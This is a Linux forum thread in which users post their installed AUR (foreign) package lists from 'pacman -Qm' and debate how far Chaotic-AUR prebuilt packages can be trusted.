Post your pacman -Qm

mrvictory · November 5, 2022, 3:11pm

Chaotic-AUR is a literal hack for minimizing foreign packages. I have just 2 packages to enable keyboard RGB control.

mr-victory% pacman -Qm                          
clevo-xsm-wmi-dkms 1.1-7
clevo-xsm-wmi-util 1.1-1

Echoa · November 6, 2022, 4:04am

Well they’re still foreign, and largely not audited. Chaotic just provides prebuilt AUR packages which is arguably not good as they don’t check it and users trust them so users don’t check either.

Unless you can be very certain of the pkg or pkgbuild provider I recommend making your own pkgbuild or if you must use AUR don’t use automated tools for it.

That’s just my paranoid 2 cents

Echoa · November 6, 2022, 6:16am

Here are my foreign packages

I made the pkgbuild for vkbasalt but NoWrep is fairly well known for their work and they maintain the AUR pkgbuild for vkcapture which they develop.

pacman -Qm
lib32-obs-vkcapture-git r218.e35dec2-1
lib32-vkbasalt 0.3.2.6-1
obs-vkcapture-git r218.e35dec2-1
vkbasalt 0.3.2.6-1

I use the Arch repo pkgbuild for building mesa and i just change the sources to Mesa Main Branch for mesa-git

mrvictory · November 6, 2022, 3:41pm

Packages are built by clusters Garuda devs maintain and the packages are signed so you need to import a key before using them so there is a certain level of security. By habit if a package isn’t on Chaotic AUR I just clone it, read the PKGBUILD and compile myself.

Echoa · November 6, 2022, 6:57pm

That only assures in flight security, the issue isn’t the package being signed or not. The build servers do hourly/daily builds and the pkgbuild content isn’t actively audited.

They don’t have the man power to audit each pkgbuild and have the build frequency they have. Chaotic AUR should be treated exactly like the AUR and with as much suspicion. The “its signed so its OK” thought process is exactly the sorta issue I was referring to. The pkgs from Arch Repo you have at least some assurance from trusted maintainers that pkgbuilds aren’t just thrown out there and the pkgs aren’t just built/released hourly/daily.

I’m not saying don’t use Chaotic, I’m saying don’t trust it like you shouldn’t trust just any AUR pkgbuild. Unless you know you can trust that pkgbuild maintainer and can be sure someone hasn’t tampered with it by taking over the pkgbuild any AUR pkg is a security concern and foreign pkg.

Quote from PedroHLC who founded chaotic

chaotic-aur maintainer here.
Is it safe to use?
Nope. We build in containers, enforce https to connect to aur, and manually approve gpg keys of sources, but everything go to waste while we trust openly in the AUR. Because any user can obtain an orphan package, upload whatever he wants there, and that will be signed and redistributed as ours.

However, you can trust that one package X is build of the same PKGBUILD as seen in AUR. So before installing/updating something from the repo you can always check if the PKGBUILD is safe. As you should do when installing from AUR helpers.

Well, I used to be a member of SIn’s red team, pen-testing UFSCar itself (lonewolf’s host). So there is a bare minimum setup of security in both clusters in place. Soon we’ll move hosting and building to a new infra that will isolate everything even more.

Maybe in the future move to having two repos: one with reviewed PKGBUILDs and one “staging” with untrustworthy latest.

theremper · November 6, 2022, 9:41pm

heroic-games-launcher-beta-bin 2.5.0-2
libpamac-aur 11.4.1-1
mint-x-icons 1.6.4-1
optimus-manager 1.4-4
optimus-manager-qt 1.6.9-1
pamac-aur 10.4.3-1
protontricks-git 1.9.2.r4.gfd93e45-1
python-vdf 3.4-2

hsdredgun · November 6, 2022, 10:20pm

appimagelauncher 2.2.0-6
brave-bin 1:1.45.118-1
expressvpn 3.34.1.0-1
gestures 0.3.1-1
gtkhash 1.4-5
kvantum-qt5-git 1.0.6.r2.gd369913a-1
libinput-gestures 2.73-1
spotify 1:1.1.84.716-2
tradingview-bin 1.0.17-2
visual-studio-code-bin 1.73.0-1

Not much

idiotbusy · November 7, 2022, 2:37am

bitwig-studio-earlyaccess 4.4.2-1
corectrl-git 1.2.0.r133.geccb490-1
frontieres-git 0.4.0-1
kernel-install-mkinitcpio 1.1-1
linux-xanmod 6.0.7-1
linux-xanmod-headers 6.0.7-1
mpv-git 0.34.0_541_g0f1ae8896e-1
plugdata-git r1598.cebce247-1
timeshift 22.06.5-2
vimix-gtk-themes-git r471.8e544ae-1
vital-synth 1.5.5-1
yay 11.3.0-1

arcDaniel · November 7, 2022, 3:48am

That is an old version, 1.31 is available in the regular repos.

idiotbusy · November 7, 2022, 4:40am

oh good looks dog

yum13241 · November 12, 2022, 6:28pm

jdk18-openj9-bin 18.0.2.1-1
jdk8-openj9-bin 8.u332.b09-1
pollymc-bin 5.1-1
snapper-support 1.1.2-2
turbowarp-desktop-bin 1.6.1-1

mrvictory · November 12, 2022, 7:08pm

Prism Launcher fork

Interesting, Prism is a fork of MultiMC and other people forked Prism and named it PollyMC?

yum13241 · November 13, 2022, 12:22pm

Ahem, the name was before PolyMC was dragged to its grave. I tried to get the dev to change the name, but he didn’t listen.

It’s a long winded pun. Pirates have parrots and Polly is a common parrot name, and cracked MC players (fk M$) are pirates.

badplugin · November 13, 2022, 12:28pm

Here is mine :

[mongoose@RS6-R ~]$ pacman -Qm
cnrdrvcups-sfp 5.00-3
gnome-icon-theme 3.12.0-7
gnome-icon-theme-symbolic 3.12.0-6
ivpn 3.9.45-1
ivpn-ui 3.9.45-1
libglade 2.6.4-8
menulibre 2.2.3-1
python2 2.7.18-8
teamviewer 15.35.5-1
woeusb-ng 0.2.10-1
[mongoose@RS6-R ~]$

yum13241 · November 13, 2022, 1:01pm

try putting it in between triple backticks (`) next time.

python2 2.7.18-8

Ah yes, apps STILL use that?

UltraBlack · November 13, 2022, 1:32pm

among-us-dumpy-gif-maker 4.2.1-1
arronax 0.8.1-1
boost_ui 1.79.0-1
cpprestsdk 2.10.18-3
emusak-bin 2.1.9-1
etcher-bin 1.8.14-1
gdmap 0.8.1-7
gksu 2.0.2-6
glualint-bin 1.22.0-1
gogh-git 711.f8b6173-1
greetd-tuigreet-bin 0.8.0-0
icat 0.5-1
itch 1:1.26.0-2
kakoune-git 2022.10.31_r16_g91d45a10-1
libgksu 2.0.12-9.1
libgweather 40.0+r87+g80e5a652-2
libpipewire02 0.2.7-2
libvterm01 0.1.4-2
mdpdf-git r10.d93165f-1
megabasterd-bin 7.55-1
nerd-fonts-complete 2.2.2-2
olive-git continuous.r2299.g9d54e24d9-1
pass-git-helper 1.2.0-1
pass-update 2.1-2
pince-git r1222.9db33c3-1
proton-ge-custom-bin 1:GE_Proton7_41-1
python-keyboard 0.13.5-1
python-pygdbmi 0.10.0.0-2
sc-controller-git v0.4.8.9.r0.02ce12b4-1
soundux-git 1:r1431.5283c43-1
steamtinkerlaunch-git 11.11.r114.g4409f0d-1
waybar-git r2271.5250123d-1
wayfire-plugins-extra-git r153.39f97b1-1
wf-info-git r13.022800f-1
wf-msg-git r18.ff26b8f-1
wl-color-picker 1.3-1
wofi-calc 1.1-3
wofi-pass 0.0.1-2
xclicker 1.4.0-1
zulu-19-bin 19.0.1-1
zulu-8-bin 8.0.352-1

Wofi is neat

yum13241 · November 13, 2022, 1:45pm

How long would reinstalling all packages take?

UltraBlack · November 13, 2022, 2:02pm

The biggest packages are:

nerd-fonts-complete 2.2.2-2
olive-git continuous.r2299.g9d54e24d9-1
zulu-19-bin 19.0.1-1
zulu-8-bin 8.0.352-1

Which all is ~10 gigs if I’m not mistaken - Takes maybe 20 minutes for me

yum13241 · November 13, 2022, 4:22pm

zulu-19-bin 19.0.1-1
zulu-8-bin 8.0.352-1

need not to be counted, as they are binaries. Unless it’s one of those fake -bin packages.

UltraBlack · November 13, 2022, 4:31pm

I remember binary packages to be especially big. Zulu is also the JRE and JDK so it should be resonably thick